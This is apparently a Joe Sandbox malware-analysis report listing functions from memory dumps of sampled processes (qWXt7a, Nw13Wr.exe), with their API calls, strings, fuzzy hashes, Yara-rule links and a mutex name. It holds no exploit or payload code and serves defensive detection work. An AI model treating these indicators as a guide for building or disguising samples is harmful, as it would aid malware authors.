Source File: 00000004.00000002.2311314685.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2311271276.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311341205.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311366130.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311387307.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_qWXt7a.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
Instruction ID: fa8a6fa0d2bee757c33d907a1ee077f6af99ac06a4bdf83e559a3897f91b2a08
Opcode Fuzzy Hash: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
Instruction Fuzzy Hash: 55617F3290CB8589DB60AF16E4403AEB7A0FBD5BA4F144265EB9C17B65DF7CD194CB00

Function 000000014000EDC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2

GetModuleHandleA.KERNEL32 ref: 000000014000EE2D
GetProcAddress.KERNEL32 ref: 000000014000EE42

Strings

InitializeCriticalSectionAndSpinCount, xrefs: 000000014000EE38
kernel32.dll, xrefs: 000000014000EE26

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: AddressHandleLoadModuleProc
String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
API String ID: 3055805555-3733552308
Opcode ID: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
Instruction ID: 601bfb796087d826a15eddab62e6da73c6b3e4e45b37998f9684764b2688f2d2
Opcode Fuzzy Hash: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
Instruction Fuzzy Hash: 5C2136B1614B8582EB66DB23F8407DAA3A5B79C7C0F880526BB49577B5EF78C500C700

Function 00000001400026F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

#4.VSELOG ref: 000000014000271C
GetCurrentProcess.KERNEL32 ref: 0000000140002721
SetProcessWorkingSetSize.KERNEL32 ref: 0000000140002731

Strings

Shrinking process size, xrefs: 000000014000270E

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: Process$CurrentSizeWorking
String ID: Shrinking process size
API String ID: 2122760700-652428428
Opcode ID: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
Instruction ID: de407452bcc55573093b25e37d4a5c8190b9a80636e05c4b95c6e58ff86151e7
Opcode Fuzzy Hash: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
Instruction Fuzzy Hash: 74E0C9B4601A4191EA029F57A8A03D41260A74CBF0F815721AA290B2F0CE3985858310

Function 00000001400030B0 Relevance: 6.3, APIs: 5, Instructions: 76COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00000001400030E7
LeaveCriticalSection.KERNEL32 ref: 000000014000316B
EnterCriticalSection.KERNEL32 ref: 0000000140003195
EnterCriticalSection.KERNEL32 ref: 00000001400031C6
LeaveCriticalSection.KERNEL32 ref: 00000001400031DD

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: CriticalSection$Enter$Leave
String ID:
API String ID: 2801635615-0
Opcode ID: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
Instruction ID: acd2e58e1a3fd81a861280768b65888603737fa84cc19007189881c9ae716cb0
Opcode Fuzzy Hash: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
Instruction Fuzzy Hash: D331137A225A4082EB128F1AF8407D57364F79DBF5F480221FF6A4B7B4DB3AC8858744

Function 00007FFE1320E3F4 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FFE1320E473
WriteFile.KERNEL32 ref: 00007FFE1320E73B
WriteFile.KERNEL32 ref: 00007FFE1320E781
GetLastError.KERNEL32 ref: 00007FFE1320E837

Memory Dump Source

Source File: 00000004.00000002.2311314685.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2311271276.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311341205.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311366130.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311387307.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_qWXt7a.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
Instruction ID: 2f4e42e3cda2d1260206cf9af723085cb5dd06dacd5d765ece9597380c2fb2ea
Opcode Fuzzy Hash: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
Instruction Fuzzy Hash: 8FD1B132B18E818DE711DF76D4802EC37A1FBA47A8B144266DE5D67BA9DE38D44AC340

Function 00007FFE1320ED1C Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFE1320ED07), ref: 00007FFE1320EE38
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFE1320ED07), ref: 00007FFE1320EEC3

Memory Dump Source

Source File: 00000004.00000002.2311314685.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2311271276.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311341205.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311366130.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311387307.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_qWXt7a.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
Instruction ID: 11ef1a8bf586a0d393a0e2522c75b2153d25744cad5abcbaff528ce9f7beea23
Opcode Fuzzy Hash: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
Instruction Fuzzy Hash: 3D91F972F18E518DF750AF26944027D2BA4FBA4BA8F144179DE4E776A5CF38D48AC300

Function 0000000140004760 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004774
ResetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004870
SetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000487D
LeaveCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000488A

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: CriticalEventSection$EnterLeaveReset
String ID:
API String ID: 3553466030-0
Opcode ID: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
Instruction ID: 8df361fa7c869b6ec715234f9c2df2ced8c6baf833446e4218a9444c3b5dacad
Opcode Fuzzy Hash: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
Instruction Fuzzy Hash: 0F31D1B5614F4881EB42CB57F8803D463A6B79CBD4F984516EB0E8B372EF3AC4958304

Function 0000000140004400 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 000000014000441F
ResetEvent.KERNEL32 ref: 00000001400044CB
SetEvent.KERNEL32 ref: 00000001400044D5
LeaveCriticalSection.KERNEL32 ref: 00000001400044DF

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: CriticalEventSection$EnterLeaveReset
String ID:
API String ID: 3553466030-0
Opcode ID: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
Instruction ID: 80aeca48758360c6ba791d23c15ba34d7cc547f8c7a26c6fbcbbb07f4ec0a80e
Opcode Fuzzy Hash: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
Instruction Fuzzy Hash: 6F3127B2220A8483D761DF27F48439AB3A0F798BD4F000116EB8A47BB5DF39E491C344

Function 00007FFE13202218 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FFE13202244
GetCurrentThreadId.KERNEL32 ref: 00007FFE13202252
GetCurrentProcessId.KERNEL32 ref: 00007FFE1320225E
QueryPerformanceCounter.KERNEL32 ref: 00007FFE1320226E

Memory Dump Source

Source File: 00000004.00000002.2311314685.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2311271276.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311341205.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311366130.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311387307.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_qWXt7a.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
Instruction ID: 272c76aa9800d4ea19af2232f6f9c397ac0027fa92f9c923c2e78f4976068d7e
Opcode Fuzzy Hash: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
Instruction Fuzzy Hash: 57114C22B14F058EEB00EB61E8442B833A4F7A9768F441A31EA2D567A4DF38D158C340

Function 0000000140013670 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 000000014001367B
CreateEventW.KERNEL32 ref: 000000014001368D
CreateEventW.KERNEL32 ref: 00000001400136A7
CreateEventW.KERNEL32 ref: 00000001400136C0

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: CreateEvent$CriticalInitializeSection
String ID:
API String ID: 926662266-0
Opcode ID: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
Instruction ID: 312f8d8d13b8a868d26f937b45fb8075aed367f1a83d8c92d196673213f535ba
Opcode Fuzzy Hash: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
Instruction Fuzzy Hash: 8F015A31610F0582E726DFA2B855BCA37E2F75D385F854529FA4A8B630EF3A8145C700

Function 00007FFE13205C00 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FFE13205C2A

Strings

csm, xrefs: 00007FFE13205DBE
csm, xrefs: 00007FFE13205C4F

Memory Dump Source

Source File: 00000004.00000002.2311314685.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2311271276.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311341205.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311366130.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311387307.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_qWXt7a.jbxd

Similarity

API ID: __except_validate_context_record
String ID: csm$csm
API String ID: 1467352782-3733052814
Opcode ID: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
Instruction ID: f1d2e2fd17941ae0aed92f12a68203b378344e8b2e1918b10fa97cf588ceabe8
Opcode Fuzzy Hash: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
Instruction Fuzzy Hash: B971A23290CA81CED760AF16948477D7BA0FB94BA4F248176DE8C27AA9CB3CD459C744

Function 00007FFE13206298 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FFE13206342
_CreateFrameInfo.LIBVCRUNTIME ref: 00007FFE1320636B

Strings

csm, xrefs: 00007FFE1320646B

Memory Dump Source

Source File: 00000004.00000002.2311314685.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2311271276.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311341205.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311366130.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311387307.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_qWXt7a.jbxd

Similarity

API ID: CreateFrameInfo__except_validate_context_record
String ID: csm
API String ID: 2558813199-1018135373
Opcode ID: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
Instruction ID: 2e9e6dd85660fb2dc92949af328fe756a99b647852f2c460bc9243a0dd076ce6
Opcode Fuzzy Hash: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
Instruction Fuzzy Hash: 86514C36619B419AE630BF26E44026E77A4FB99BA0F100578EB8D17B65CF38E465CB00

Function 00007FFE1320EA8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FFE1320EBA3
GetLastError.KERNEL32 ref: 00007FFE1320EBC5

Strings

U, xrefs: 00007FFE1320EB4F

Memory Dump Source

Source File: 00000004.00000002.2311314685.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2311271276.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311341205.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311366130.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311387307.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_qWXt7a.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
Instruction ID: 96d9921f371156dee5bc0b969e71a778a2e6af7f59015b0af30117a24051e558
Opcode Fuzzy Hash: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
Instruction Fuzzy Hash: F341C322B19E4189DB20EF66E4443AE67A0FBE87A4F404131EE4E977A4DF3CD445CB40

Function 0000000140012523 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32 ref: 000000014001256D
RaiseException.KERNEL32 ref: 000000014001258A

Strings

csm, xrefs: 00000001400125BE

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: ExceptionRaise
String ID: csm
API String ID: 3997070919-1018135373
Opcode ID: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
Instruction ID: 49e9958dea4625aba6399e71a496f31833793ec74c7c4936f150dd50c3eb5df3
Opcode Fuzzy Hash: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
Instruction Fuzzy Hash: 1D315036204A8082D771CF16E09079EB365F78C7E4F544111EF9A077B5DB3AD892CB41

Function 00007FFE13210910 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE13203A38: __except_validate_context_record.LIBVCRUNTIME ref: 00007FFE13203A63

__GSHandlerCheckCommon.LIBCMT ref: 00007FFE13210993

Strings

csm, xrefs: 00007FFE1321092B
f, xrefs: 00007FFE13210925

Memory Dump Source

Source File: 00000004.00000002.2311314685.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2311271276.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311341205.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311366130.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311387307.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_qWXt7a.jbxd

Similarity

API ID: CheckCommonHandler__except_validate_context_record
String ID: csm$f
API String ID: 1543384424-629598281
Opcode ID: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
Instruction ID: 2511db9295f67cd2b0af936af4d2ceb962597c6b3c27032a0458c945649b6add
Opcode Fuzzy Hash: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
Instruction Fuzzy Hash: 3A11B432B14B8589E750AF23A54116E6764EB95FD4F08C075EF881BB66CE3CD851C700

Function 0000000140003620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45timeCOMMON

Download Yara Rule

APIs

SetWaitableTimer.KERNEL32 ref: 0000000140003665
#4.VSELOG ref: 00000001400036AC

Strings

amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d, xrefs: 000000014000368F

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: TimerWaitable
String ID: amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d
API String ID: 1823812067-484248852
Opcode ID: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
Instruction ID: 814455377fd743a09d1ce94c7697c2570c7384a68551c8a3e3690f56dccab0e4
Opcode Fuzzy Hash: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
Instruction Fuzzy Hash: 25114975608B4082EB21CF16B84079AB7A4F79DBD4F544225FF8847B79DB39C5508B40

Function 00007FFE13203990 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFE1320112F), ref: 00007FFE132039E0
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFE1320112F), ref: 00007FFE13203A21

Strings

csm, xrefs: 00007FFE13203A0E

Memory Dump Source

Source File: 00000004.00000002.2311314685.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2311271276.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311341205.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311366130.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311387307.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_qWXt7a.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
Instruction ID: c9adcb3f117668cf4dcdf6fa09084068a340d43751dfd92c3e390705219793ff
Opcode Fuzzy Hash: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
Instruction Fuzzy Hash: CF115B32618F8586EB209B16E40026AB7E4FB98B94F584270EFCD17B69DF3CD555CB00

Function 00000001400036E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39timeCOMMON

Download Yara Rule

APIs

SetWaitableTimer.KERNEL32 ref: 0000000140003725
#4.VSELOG ref: 0000000140003762

Strings

amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d, xrefs: 0000000140003745

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: TimerWaitable
String ID: amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d
API String ID: 1823812067-3336177065
Opcode ID: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
Instruction ID: 709d983207ec740d9f2c7308925ee729c80a4ac6442fb255827ec98b57545574
Opcode Fuzzy Hash: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
Instruction Fuzzy Hash: 731170B2614B8082D711CF16F480B9AB7A4F38CBE4F444216BF9C47B68CF78C5508B40

Function 00000001400137D0 Relevance: 5.0, APIs: 4, Instructions: 27memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000001400137EB
HeapFree.KERNEL32 ref: 00000001400137FD
GetProcessHeap.KERNEL32 ref: 0000000140013820
HeapFree.KERNEL32 ref: 0000000140013832

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
Instruction ID: 86a4b35954e85bb75ec39e114bccfc50e282ec3ca0152174d73c8df7cd9b4be4
Opcode Fuzzy Hash: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
Instruction Fuzzy Hash: ADF07FB4615B4481FB078FA7B84479422E5EB4DBC0F481028AB494B3B0DF7A80998710

Analysis Process: Nw13Wr.exePID: 7976, Parent PID: 8184COMMON

Execution Graph

Execution Coverage:	2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1.7%
Total number of Nodes:	806
Total number of Limit Nodes:	19

Executed Functions

Function 00BF1000 Relevance: 29.8, APIs: 13, Strings: 4, Instructions: 73
libraryloadersynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32(00000000), ref: 00BF1006
CreateMutexW.KERNEL32(00000000,00000000,Global\IEToolbarUninstaller), ref: 00BF1013
GetLastError.KERNEL32 ref: 00BF101F
GetCommandLineW.KERNEL32(?), ref: 00BF1040
CommandLineToArgvW.SHELL32(00000000), ref: 00BF1047
